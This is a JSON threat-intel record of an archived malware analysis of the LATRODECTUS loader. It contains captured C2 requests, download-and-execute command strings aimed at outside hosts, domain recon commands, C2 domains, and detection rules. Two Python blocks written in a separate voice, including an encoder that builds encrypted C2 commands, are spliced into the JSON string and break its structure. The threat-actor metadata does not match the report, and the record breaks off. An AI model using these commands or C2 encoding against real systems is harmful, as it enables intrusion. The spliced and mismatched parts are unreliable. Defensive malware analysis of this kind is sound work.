{
	"id": "a5d73283-32c1-43cf-aeab-0db54c43fa48",
	"created_at": "2026-04-06T00:08:07.502423Z",
	"updated_at": "2026-04-10T03:35:21.37028Z",
	"deleted_at": null,
	"sha1_hash": "072929111694cfc003586a2f3544f38bb24a62b7",
	"title": "Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID",
	"llm_title": "",
	"authors": "Daniel Stepanic, Samir Bousseaden",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3437053,
	"plain_text": "Spring Cleaning with LATRODECTUS: A Potential Replacement for\r\nICEDID\r\nBy Daniel Stepanic, Samir Bousseaden\r\nPublished: 2024-05-16 · Archived: 2026-04-05 19:54:10 UTC\r\nLATRODECTUS at a glance\r\nFirst discovered by Walmart researchers in October of 2023, LATRODECTUS is a malware loader gaining popularity\r\namong cybercriminals. While this is considered a new family, there is a strong link between LATRODECTUS and ICEDID\r\ndue to behavioral and developmental similarities, including a command handler that downloads and executes encrypted\r\nICEDID payloads. Proofpoint and Team Cymru built upon this connection to discover a strong link between the\r\nnetwork infrastructure used by the operators of ICEDID and LATRODECTUS.\r\nLATRODECTUS offers a comprehensive range of standard capabilities that threat actors can use to deploy further\r\npayloads and conduct various activities after initial compromise. The code base isn’t obfuscated and contains only 11\r\ncommand handlers focused on enumeration and execution. 
This type of loader represents a recent wave observed by our\r\nteam, such as PIKABOT, where the code is more lightweight and direct with a limited number of handlers.\r\nThis article will focus on LATRODECTUS itself, analyzing its most significant features and sharing resources for\r\naddressing this financially impactful threat.\r\nKey takeaways\r\nInitially discovered by Walmart researchers last year, LATRODECTUS continues to gain adoption among recent\r\nfinancially-motivated campaigns\r\nLATRODECTUS, a possible replacement for ICEDID, shares similarities with ICEDID, including a command handler that\r\nexecutes ICEDID payloads\r\nSince its initial discovery we have observed new event handlers (process discovery, desktop file listing) and the integration of a self-delete technique that deletes the running file\r\nElastic Security provides a high degree of capability through memory signatures, behavioral rules, and hunting\r\nopportunities to respond to threats like LATRODECTUS\r\nLATRODECTUS campaign overview\r\nBeginning early March of 2024, Elastic Security Labs observed an increase in email campaigns delivering\r\nLATRODECTUS. 
These campaigns typically involve a recognizable infection chain: oversized JavaScript files\r\nthat use WMI to invoke msiexec.exe and install an MSI file hosted on a remote WEBDAV\r\nshare.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 1 of 26\n\nWith major changes in the loader space during the past year, such as the QBOT takedown and ICEDID dropping off, new\r\nloaders such as PIKABOT and LATRODECTUS have emerged as possible replacements.\r\nLATRODECTUS analysis\r\nOur LATRODECTUS sample comes initially packed, with file information masquerading as a component of Bitdefender’s\r\nkernel-mode driver (TRUFOS.SYS), shown in the following image.\r\nFile version information of packed LATRODECTUS sample\r\nIn order to move forward with malware analysis, the sample must be unpacked manually or via an automatic unpacking\r\nservice such as UnpacMe.\r\nUnpacMe summary\r\nLATRODECTUS is a DLL with 4 different exports, and each export is assigned the same export address.\r\nExports for LATRODECTUS\r\nString obfuscation\r\nAll of the strings within LATRODECTUS are protected with a straightforward algorithm that transforms the encrypted bytes\r\nusing arithmetic and bitwise operations. The initial report published in 2023 detailed a\r\nPRNG algorithm that was not observed in our sample, suggesting continuous development of this loader. 
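A stand-alone encoder/decoder pair for this string format, added here as an example; it is not code from the page, the loader, or the nightMARE framework. It assumes the layout the page's decoder reads: a 4-byte little-endian key, a 2-byte length XORed with the low 16 bits of the key, then one ciphertext byte per character, each XORed with the low byte of (key + index + 1). The encoder exists only to build test input, and the sample key and blob are constructed, not taken from the binary.

```python
import struct

MASK32 = 0xFFFFFFFF


def encode_blob(plain: bytes, key: int) -> bytes:
    """Build a blob in the assumed LATRODECTUS string layout (used here only to construct test input)."""
    key &= MASK32
    masked_len = (key ^ len(plain)) & 0xFFFF
    # keystream byte i is the low byte of (key + i + 1)
    body = bytes((((key + i + 1) & 0xFF) ^ b) for i, b in enumerate(plain))
    return struct.pack('<IH', key, masked_len) + body


def decode_blob(encrypted: bytes) -> bytes:
    """Recover the plaintext; bytes past the encoded length are ignored."""
    if len(encrypted) < 6:
        raise ValueError('blob shorter than the 6-byte header')
    key, masked_len = struct.unpack_from('<IH', encrypted, 0)
    # the 2-byte length field is XORed with the low 16 bits of the key
    size = (key ^ masked_len) & 0xFFFF
    payload = encrypted[6:6 + size]
    if len(payload) != size:
        raise ValueError('blob truncated: header says %d bytes, %d present' % (size, len(payload)))
    return bytes((((key + i + 1) ^ b) & 0xFF) for i, b in enumerate(payload))


# Constructed sample (not from the malware): key 0x11223344 over the string ntdll.dll,
# written out as the bytes encode_blob produces so the decoder can be checked by hand:
# header 44 33 22 11 (key) 4d 33 (0x3344 ^ 9), then 9 ciphertext bytes.
SAMPLE_BLOB = bytes.fromhex('443322114d332b32232425642f2021')


def decode_sample() -> str:
    return decode_blob(SAMPLE_BLOB).decode('ascii')
```

Walking a dump of the whole string table is deliberately not shown: the page does not describe how entries are laid out relative to one another, so that part would be guesswork.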
Below is the\r\nalgorithm implemented in Python using our nightMARE framework:\r\n# cast helpers (u32, u16, p32) come from Elastic's nightMARE framework; import path assumed\r\nfrom nightmare.core import cast\r\n\r\ndef decrypt_string(encrypted_bytes: bytes) -\u003e bytes:\r\n    # 4-byte key, then a 2-byte length masked with the low 16 bits of the key\r\n    x = cast.u32(encrypted_bytes[:4])\r\n    y = cast.u16(encrypted_bytes[4:6])\r\n    byte_size = cast.u16(cast.p32(x ^ y)[:2])\r\n    decoded_bytes = bytearray(byte_size)\r\n    # each byte is XORed with the low byte of (key + index + 1)\r\n    for i, b in enumerate(encrypted_bytes[6 : 6 + byte_size]):\r\n        decoded_bytes[i] = ((x + i + 1) ^ b) % 256\r\n    return bytes(decoded_bytes)\r\nRuntime API\r\nLATRODECTUS obfuscates the majority of its imports until runtime. At the start of the program, it queries the PEB’s loaded-module list and\r\nuses a CRC32 checksum of names to resolve the kernel32.dll and ntdll.dll modules and their functions. In\r\norder to resolve additional libraries such as user32.dll or wininet.dll, the malware takes a different approach,\r\nperforming a wildcard search ( *.dll ) in the Windows system directory. It retrieves each DLL filename and passes it\r\ndirectly to a CRC32 checksum function.\r\nDLL search using a CRC32 checksum\r\nAnti-analysis\r\nWhen all the imports are resolved, LATRODECTUS performs several anti-analysis checks in sequence. The first monitors for a\r\ndebugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB). 
If a debugger is identified,\r\nthe program terminates.\r\nBeingDebugged check via PEB\r\nIn order to avoid sandboxes or virtual machines that may have a low number of active processes, two validation checks\r\ncombine the number of running processes with the OS product version.\r\nNumber of processes and OS validation checks\r\nIn order to account for the major differences between Windows OS versions, the developer uses a custom enum based on the\r\nmajor/minor version and build numbers within Windows.\r\nEnum related to build numbers, OS version\r\nThe two previous conditions translate to:\r\nLATRODECTUS will exit if the number of processes is less than 75 and the OS version is a recent build such as\r\nWindows 10, Windows Server 2016, or Windows 11\r\nLATRODECTUS will exit if the number of processes is less than 50 and the OS version is an older build such as\r\nWindows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2\r\nAfter the sandbox check, LATRODECTUS verifies whether the current process is running under WOW64, a subsystem of\r\nWindows that allows 32-bit applications to run on 64-bit systems. If true (running as a 32-bit\r\napplication on a 64-bit OS), the malware will exit.\r\nIsWow64Process check\r\nThe last check verifies the MAC address via the GetAdaptersInfo() call from iphlpapi.dll. 
If there is no\r\nvalid MAC address, the malware will also terminate.\r\nMAC Address check\r\nMutex\r\nThis malware uses the string runnung as the mutex to prevent re-infection on the host, which may be an accidental typo on\r\nthe part of the developers.\r\nMutex\r\nHardware ID\r\nAfter the mutex creation, LATRODECTUS generates a hardware ID seeded from the volume serial number of the\r\nmachine, multiplied by a hard-coded constant ( 0x19660D ).\r\nHWID calculation\r\nCampaign ID\r\nAt this stage, the decrypted campaign name ( Littlehw ) from our sample is used as a seed passed into a Fowler–Noll–Vo\r\nhashing function. This produces a hash that the actor uses to track different campaigns and associated victim\r\nmachines.\r\nCampaign ID calculation using FNV\r\nSetup / persistence\r\nThe malware generates a folder path using a configuration parameter that determines the location where\r\nLATRODECTUS will be dropped on disk, one of the following directories:\r\nAppData\r\nDesktop\r\nStartup\r\nPersonal\r\nLocal\\AppData\r\nOur sample was configured with the AppData location, using a hard-coded directory string Custom_update along with a\r\nhardcoded filename Update_ concatenated with digits seeded from the volume serial number. 
Below is the full file path\r\ninside our VM:\r\nC:\\Users\\REM\\AppData\\Roaming\\Custom_update\\Update_88d58563.dll\r\nThe malware checks for an existing file AppData\\Roaming\\Custom_update\\update_data.dat to read from, and if the file\r\ndoes not exist it creates the directory before writing a copy of itself there.\r\nLATRODECTUS written in AppData\r\nAfter the file is copied, LATRODECTUS retrieves two C2 domains from the global configuration, using the previously-described string decryption function.\r\nDecrypting C2 servers\r\nBefore the main thread is executed for command dispatching, LATRODECTUS sets up a scheduled task for persistence\r\nusing the Windows Component Object Model (COM).\r\nScheduled task creation via COM\r\nIn our sample, the task name is hardcoded as Updater and scheduled to execute upon successful logon.\r\nScheduled task properties\r\nSelf-deletion\r\nSelf-deletion is one noteworthy technique incorporated by LATRODECTUS. It was discovered by Jonas Lykkegaard and\r\nimplemented by Lloyd Davies in the delete-self-poc repo. The technique allows LATRODECTUS to delete itself while the\r\nprocess is still running, by renaming the file’s primary data stream to an alternate data stream and then marking the file for deletion.\r\nElastic Security Labs has seen this technique adopted in malware such as the ROOK ransomware family. The likely\r\nobjective is to hinder incident response processes by interfering with collection and analysis. The compiled malware\r\ncontains a string ( :wtfbbq ) present in the repository.\r\nSelf-deletion code in LATRODECTUS\r\nThis technique is observed at the start of the infection as well as when the malware performs an update using event handler\r\n#15. 
Elastic Security Labs has created a CAPA rule to help other organizations identify this behavior generically when\r\nanalyzing various malware.\r\nCommunication\r\nLATRODECTUS encrypts its requests with RC4 using the hardcoded key 12345 and then base64-encodes the result. The first POST\r\nrequest over HTTPS registers the infected system and includes victim information along with configuration details.\r\nPOST https://aytobusesre.com/live/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nHost: aytobusesre.com\r\nContent-Length: 256\r\nCache-Control: no-cache\r\nM1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FB\r\nInitial registration request\r\nBelow is an example of the decrypted contents sent in the first request:\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026up=4\u0026direction=aytob\r\nName - Description\r\ncounter - Number of C2 requests; increments by one for each callback\r\ntype - Type of request (registration, etc.)\r\nguid - Generated hardware ID seeded by the volume serial number\r\nos - Windows OS product version\r\narch - Windows architecture version\r\nusername - Username on the infected machine\r\ngroup - Campaign identifier: FNV hash seeded by a unique string in the binary\r\nver - LATRODECTUS version\r\nup - Unknown\r\ndirection - C2 domain\r\nmac - MAC address\r\ncomputername - Hostname of the infected machine\r\ndomain - Domain the infected machine belongs to\r\nEach command request is pipe-delimited into an object type, an integer value, and the corresponding argument. 
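The campaign identifier from the Campaign ID section and the request encoding and command framing described here, as one added example written for this article; it is not code from the page, the loader, or Elastic's tooling, and the function names are my own. Assumptions: the campaign hash is 32-bit FNV-1a with the standard offset basis 0x811C9DC5 and prime 0x01000193 (XOR the byte, then multiply, which is the order the $campaign_fnv YARA bytes encode); with that variant the decrypted campaign name Littlehw hashes to exactly the group=510584660 value in the registration body above. RC4 is the textbook cipher with the hardcoded key 12345. The hardware-ID step is modelled only as the 32-bit multiply by 0x19660D that the $hwid_calc pattern contains; how the sample turns that into the longer guid string is not described on the page and is not reproduced.

```python
import base64

FNV_OFFSET_32 = 0x811C9DC5
FNV_PRIME_32 = 0x01000193
HWID_MULTIPLIER = 0x19660D   # imul constant from the $hwid_calc YARA bytes
C2_KEY = b'12345'            # hardcoded RC4 password from the sample
OBJECT_TYPES = ('CLEARURL', 'URLS', 'COMMAND', 'ERROR')


def fnv1a32(data: bytes) -> int:
    # XOR the byte in, then multiply: the order the loader's campaign hash uses
    h = FNV_OFFSET_32
    for b in data:
        h ^= b
        h = (h * FNV_PRIME_32) & 0xFFFFFFFF
    return h


def campaign_id(name: str) -> int:
    """group= value derived from the decrypted campaign name."""
    return fnv1a32(name.encode('ascii'))


def hwid_seed(volume_serial: int) -> int:
    # 32-bit multiply only; the guid formatting built on top of it is not modelled
    return (volume_serial * HWID_MULTIPLIER) & 0xFFFFFFFF


def rc4(key: bytes, data: bytes) -> bytes:
    # key-scheduling algorithm
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # keystream generation; XOR is symmetric, so this both encrypts and decrypts
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_c2(plaintext: str) -> str:
    """RC4 with the hardcoded key, then base64, as carried in the request body."""
    return base64.b64encode(rc4(C2_KEY, plaintext.encode('utf-8'))).decode('ascii')


def decode_c2(blob: str) -> str:
    return rc4(C2_KEY, base64.b64decode(blob)).decode('utf-8', errors='replace')


def parse_registration(body: str) -> dict:
    """Split a decrypted registration body into its key=value fields."""
    return dict(field.split('=', 1) for field in body.split('&') if '=' in field)


def parse_command(line: str) -> tuple:
    """OBJECT|ID|ARGUMENT, e.g. COMMAND|12|http://www.meow123.com/test"""
    obj, ident, arg = line.split('|', 2)
    if obj not in OBJECT_TYPES:
        raise ValueError('unknown object type: ' + obj)
    return obj, int(ident), arg
```

The page states that the base64 strings it shows (the registration body above and the COMMAND|13 sample in the sandboxing section) are RC4 with key 12345, so decode_c2 is where an analyst would paste them; the example itself only checks the cipher against published RC4 test vectors and round-trips its own output.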
There are 4 object types which\r\nroute the attacker-controlled commands (CLEARURL, URLS, COMMAND, ERROR).\r\nCommand dispatching logic\r\nThe main event handlers are invoked through the COMMAND object type with the handler ID and its respective argument.\r\nCOMMAND|12|http://www.meow123.com/test\r\nThe CLEARURL object type is used to delete any configured domains. The URLS object type allows the attacker to swap\r\nto a new C2 URL. The last object type, ERROR, is not currently configured.\r\nExample of command request via CyberChef\r\nBot Functionality\r\nLATRODECTUS’s core functionality is driven through its command handlers. These handlers are used to collect\r\ninformation from the victim machine, provide execution capabilities and configure the implant. We have seen two\r\nadditional handlers (retrieve processes, desktop listing) added since the initial publication, which may be a sign that the\r\ncodebase is still active and changing.\r\nCommand ID - Description\r\n2 - Retrieve file listing from desktop directory\r\n3 - Retrieve process ancestry\r\n4 - Collect system information\r\n12 - Download and execute PE\r\n13 - Download and execute DLL\r\n14 - Download and execute shellcode\r\n15 - Perform update, restart\r\n17 - Terminate own process and threads\r\n18 - Download and execute ICEDID payload\r\n19 - Increase beacon timeout\r\n20 - Reset request counter\r\nDesktop listing - command ID (2)\r\nThis command handler retrieves a list of the contents of the user’s desktop, which the developer refers to as desklinks .\r\nThis data is encrypted and appended to the outbound beacon request. 
This is used for enumerating and validating\r\nvictim environments quickly.\r\nDesktop listing (Handler #2)\r\nExample request:\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026up=4\u0026direction=aytob\r\nProcess ancestry - command ID (3)\r\nThis event handler is referenced as proclist by the developer; it collects the entire running process ancestry from the\r\ninfected machine via the CreateToolhelp32Snapshot API.\r\nRetrieve process ancestry (Handler #3)\r\nLike security researchers, malware authors are interested in process parent/child relationships for decision-making. The\r\nauthors of LATRODECTUS even collect information about process grandchildren, likely to validate different compromised\r\nenvironments.\r\nExample of process ancestry collected by LATRODECTUS\r\nCollect system information - command ID (4)\r\nThis command handler creates a new thread that runs the following system discovery/enumeration commands, each of\r\nwhich is a potential detection opportunity:\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe /c systeminfo\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe /c net view /all\r\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:L\r\nC:\\Windows\\System32\\cmd.exe /c net config workstation\r\nC:\\Windows\\System32\\cmd.exe 
/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get Displ\r\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\r\nEach command’s output is placed into the request under a corresponding parameter:\r\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nDownload and execute PE - command ID (12)\r\nThis handler downloads a PE file from the C2 server, writes the content to disk with a randomly generated file name,\r\nthen executes the file.\r\nDownload and run PE function (Handler #12)\r\nBelow is an example in our environment using this handler:\r\nProcess tree of download and run PE function\r\nDownload and execute DLL - command ID (13)\r\nThis command handler downloads a DLL from the C2 server, writes it to disk with a randomly generated file name, and\r\nexecutes the DLL using rundll32.exe.\r\nDownload and run DLL function (Handler #13)\r\nDownload and execute shellcode - command ID (14)\r\nThis command handler downloads shellcode from the C2 server via InternetReadFile , allocates and copies the shellcode\r\ninto memory, then calls it directly with a new thread pointing at the shellcode.\r\nShellcode execution (Handler #14)\r\nUpdate / restart - command ID (15)\r\nThis handler appears to perform a binary update of the malware: the update is downloaded, and the existing thread/mutex is notified\r\nand then released. 
The file is subsequently deleted and a new binary is downloaded and executed before the existing\r\nprocess terminates.\r\nUpdate handler (Handler #15)\r\nTerminate - command ID (17)\r\nThis handler terminates the existing LATRODECTUS process.\r\nSelf-termination (Handler #17)\r\nDownload and execute hosted ICEDID payload - command ID (18)\r\nThis command handler downloads two ICEDID components from a LATRODECTUS server and executes them using a\r\nspawned rundll32.exe process. We haven’t personally observed this being used in the wild, however.\r\nThe handler creates a folder containing two files in the AppData\\Roaming\\ directory. These file paths and filenames are\r\nseeded by a custom random number generator, which we review in the beacon timeout section below. In our case, this new folder location\r\nis:\r\nC:\\Users\\REM\\AppData\\Roaming\\-632116337\r\nIt retrieves a file ( test.dll ) from the C2 server, the standard ICEDID loader, which is written to disk with a randomly\r\ngenerated file name ( -456638727.dll ).\r\nLATRODECTUS downloading ICEDID loader\r\nLATRODECTUS then performs similar steps by generating a random filename for the ICEDID payload\r\n( 1431684209.dat ). Before performing the download, it sets up the arguments to properly load ICEDID. If you have run\r\ninto ICEDID in the past, this part of the command line should look familiar: it’s used to call the ICEDID export of the\r\nloader, while passing the relative path to the encrypted ICEDID payload file.\r\ninit -zzzz=\"-632116337\\1431684209.dat\"\r\nLATRODECTUS downloading ICEDID data\r\nLATRODECTUS initiates a second download request using a hard-coded URI ( /files/bp.dat ) from the configured C2\r\nserver, which is written to a file ( 1431684209.dat ). 
Analyzing the bp.dat file, researchers identified it as a conventional\r\nencrypted ICEDID payload, commonly referenced as license.dat .\r\nEncrypted ICEDID payload (bp.dat)\r\nAfter decrypting the file, malware researchers noted a familiar 129-byte sequence of junk bytes prepended to the file,\r\nfollowed by the custom section headers.\r\nDecrypted ICEDID payload (bp.dat)\r\nOur team was able to revisit prior tooling and successfully decrypt this file, enabling us to rebuild the PE (ICEDID).\r\nICEDID YARA triggering on rebuilt PE from bp.dat\r\nAt this point, the ICEDID loader and encrypted payload have been downloaded to the same folder.\r\nThese files are then executed together using rundll32.exe via CreateProcessW with their respective arguments. Below is\r\nthe observed command line:\r\nrundll32.exe C:\\Users\\REM\\AppData\\Roaming\\-632116337\\-456638727.dll,init -zzzz=\"-632116337\\1431684209.dat\"\r\nRundll32.exe execution\r\nScanning the rundll32.exe child process spawned by LATRODECTUS with our ICEDID YARA rule also indicates the\r\npresence of ICEDID.\r\nYARA memory scan detecting ICEDID\r\nBeacon timeout - command ID (19)\r\nLATRODECTUS supports jitter for beaconing to C2. This can make it harder for defenders to detect via network sources\r\ndue to the randomness this introduces to beaconing intervals.\r\nAdjust timeout feature (Handler #19)\r\nIn order to calculate the timeout, it generates a random number by seeding a combination of the user’s cursor position on the\r\nscreen multiplied by the system’s uptime ( GetTickCount ). 
This result is passed as a parameter to RtlRandomEx.\r\nRandom number generator using cursor position\r\nReset counter - command ID (20)\r\nThis command handler resets the request counter that is passed on each communication request. For example, on the\r\nthird callback it is set to 3, as shown here. With this function, the developer can reset the count to start again from 0.\r\ncounter=3\u0026type=4\u0026guid=638507385\r\nLATRODECTUS / ICEDID connection\r\nThere is clearly some kind of development connection or working arrangement between ICEDID and LATRODECTUS.\r\nBelow are some of the similarities observed:\r\nSame enumeration commands in the system discovery handler\r\nThe DLL exports all point to the same export function address; this was a common observation with ICEDID payloads\r\nC2 data is concatenated together as variables in the C2 traffic requests\r\nThe bp.dat file downloaded by handler (#18) is used to execute the ICEDID payload via rundll32.exe\r\nThe functions appear to be similarly coded\r\nCOM-based Scheduled Task setup - ICEDID vs LATRODECTUS\r\nResearchers didn’t conclude that there was a clear relationship between the ICEDID and LATRODECTUS families, though\r\nthey appear at least superficially affiliated. ICEDID possesses more mature capabilities, like those used for data theft or the\r\nBackConnect module, and has been richly documented over a period of several years. 
One hypothesis being considered is\r\nthat LATRODECTUS is being actively developed as a replacement for ICEDID, and the handler (#18) was included until\r\nmalware authors were satisfied with LATRODECTUS’ capabilities.\r\nSandboxing LATRODECTUS\r\nTo evaluate LATRODECTUS detections, we set up a Flask server configured with the different handlers to instruct an\r\ninfected machine to perform various actions in a sandbox environment. This method provides defenders with a great\r\nopportunity to assess the effectiveness of their detection and logging tools against every capability. Different payloads like\r\nshellcode/binaries can be exchanged as needed.\r\nCommand handlers sandboxed\r\nAs an example, for the download and execution of a DLL (handler #13), we can provide the following request structure\r\n(object type, handler, arguments for handler) to the command dispatcher:\r\nCOMMAND|13|http://www.meow123.com/dll, ShowMessage\r\nThe following example depicts the RC4-encrypted string described earlier, which has been base64-encoded.\r\nE3p1L21QSBOqEKjYrBKiLNZJTk7KZn+HWn0p2LQfOLWCz/py4VkkAxSXXdnDd39p2EU=\r\nUsing the following CyberChef recipe, analysts can generate encrypted command requests:\r\nExample with DLL Execution handler via CyberChef\r\nUsing the actual malware codebase and executing these different handlers using a low-risk framework, defenders can get a\r\nglimpse into the events, alerts, and logs recorded by their security instrumentation.\r\nDetecting LATRODECTUS\r\nThe following Elastic Defend protection features trigger during the LATRODECTUS malware infection process:\r\nElastic Defend alerts against LATRODECTUS\r\nBelow are the prebuilt MITRE ATT\u0026CK-aligned rules with descriptions:\r\nThe following list of hunts and detection queries can be used to detect LATRODECTUS 
post-exploitation commands\r\nfocused on execution:\r\nRundll32 Download PE/DLL (command handlers #12, #13 and #18):\r\nsequence by process.entity_id with maxspan=1s\r\n[file where event.action == \"creation\" and process.name : \"rundll32.exe\" and\r\n /* PE file header dropped to the InetCache folder */\r\nfile.Ext.header_bytes : \"4d5a*\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\"]\r\n[network where process.name : \"rundll32.exe\" and\r\n event.action : (\"disconnect_received\", \"connection_attempted\") and\r\n /* network disconnect activity to a public Ip address */\r\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0\r\nEQL Query using hunt detecting LATRODECTUS\r\nBelow is an ES|QL hunt to look for long-lived and/or high-count network connections by rundll32 to a public IP address\r\n(which is uncommon):\r\nfrom logs-endpoint.events.network-*\r\n| where host.os.family == \"windows\" and event.category == \"network\" and\r\n network.direction == \"egress\" and process.name == \"rundll32.exe\" and\r\n/* excluding private IP ranges */\r\n not CIDR_MATCH(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.\r\n| keep source.bytes, destination.address, process.name, process.entity_id, process.pid, @timestamp, host.name\r\n/* calc total duration and the number of connections per hour */\r\n| stats count_connections = count(*), start_time = min(@timestamp), end_time = max(@timestamp) by process.entity_id, proc\r\n| eval duration = TO_DOUBLE(end_time)-TO_DOUBLE(start_time), duration_hours=TO_INT(duration/3600000), number_of_con_per_h\r\n| keep host.name, destination.address, process.name, process.pid, duration, duration_hours, number_of_con_per_hour, count\r\n| where 
count_connections \u003e= 100\r\nES|QL Query using hunt detecting LATRODECTUS\r\nBelow is a screenshot of Elastic Defend triggering on the LATRODECTUS memory signature:\r\nMemory signatures against LATRODECTUS via Elastic Defend\r\nYARA\r\nElastic Security has created YARA rules to identify LATRODECTUS:\r\nrule Windows_Trojan_LATRODECTUS_841ff697 {\r\n    meta:\r\n        author = \"Elastic Security\"\r\n        creation_date = \"2024-03-13\"\r\n        last_modified = \"2024-04-05\"\r\n        license = \"Elastic License v2\"\r\n        os = \"Windows\"\r\n        arch = \"x86\"\r\n        threat_name = \"Windows.Trojan.LATRODECTUS\"\r\n        reference_sample = \"aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\"\r\n    strings:\r\n        $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 }\r\n        $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 0\r\n        $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 0\r\n        $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44\r\n        $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC\r\n        $hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 }\r\n        $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 
4\r\n        $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69\r\n    condition:\r\n        2 of them\r\n}\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable | Type | Name | Reference\r\naee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c | SHA-256 | TRUFOS.DLL | LATRODECTUS\r\naytobusesre.com | domain | LATRODECTUS C2\r\nscifimond.com | domain | LATRODECTUS C2\r\ngyxplonto.com | domain | ICEDID C2\r\nneaachar.com | domain | ICEDID C2\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nhttps://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice\r\nTooling\r\nString decryption and IDA commenting tool\r\nSource: https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\n",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus"
	],
	"report_names": [
		"spring-cleaning-with-latrodectus"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434087,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
